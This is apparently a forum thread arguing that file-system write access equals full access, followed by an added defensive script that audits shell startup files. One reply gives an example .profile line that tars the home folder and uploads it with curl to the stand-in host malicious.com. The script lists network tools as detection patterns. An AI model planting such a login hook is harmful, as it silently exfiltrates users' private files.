@TheEvilSkeleton The claim about security is flat out wrong.

File system access *is* full access.

If you can write to the file system, you can write a script, mark it executable, and tweak ~/.profile etc. to run it on startup. This doesn't even require being able to mark a file executable, because you can simply add e.g. 'python malicious.py' to the end of the login script.

@pixelherodev could you explain how filesystem access can access my Nextcloud information like contacts and notes?


@TheEvilSkeleton cat >>$home/.profile <<EOF
tar cz . | curl -X POST malicious.com/extract.tar&

Now, every time you log in, your entire home folder will be tarballed up and uploaded to some malicious server.

This is just a trivial example; a more sophisticated system would hide itself, and wouldn't be so obvious as to what it was doing.
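
A defender's check for the login-script persistence discussed in this thread, as an added example that is not part of the original posts: it flags non-comment lines in shell startup files that invoke network clients or script interpreters. The file list, the command list and the function name audit_login_scripts are assumptions chosen for illustration, and the match is a heuristic that a hidden or obfuscated entry would evade.

```shell
#!/bin/sh
# Added example (not from the thread): audit shell startup files for lines
# that launch network clients or script interpreters at login.

# Startup files read by common login shells (assumed, non-exhaustive list).
STARTUP_FILES=".profile .bash_profile .bash_login .bashrc .zprofile .zshrc"

# Commands that rarely belong in a login script. The leading group keeps
# names such as "mycurl" from matching while still catching /usr/bin/curl.
SUSPICIOUS='(^|[^[:alnum:]_.-])(curl|wget|nc|ncat|socat|scp|sftp|python[0-9.]*|perl|ruby)([[:space:]]|$)'

# audit_login_scripts DIR
# Prints "file:line:text" for each non-comment match in DIR's startup files.
# Returns 0 when nothing is flagged and 1 when at least one line is.
audit_login_scripts() {
    dir=$1
    found=0
    for name in $STARTUP_FILES; do
        file="$dir/$name"
        [ -f "$file" ] || continue
        # grep -n prefixes the line number; the second grep drops lines
        # that are only comments. "|| true" keeps "set -e" callers alive
        # when nothing matches.
        hits=$(grep -nE "$SUSPICIOUS" "$file" \
            | grep -vE '^[0-9]+:[[:space:]]*#' || true)
        if [ -n "$hits" ]; then
            found=1
            printf '%s\n' "$hits" | sed "s|^|$name:|"
        fi
    done
    return "$found"
}

# Usage: audit_login_scripts "$HOME"
```

Comparing the startup files against a known-good copy or a checksum baseline catches changes that this pattern match misses.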
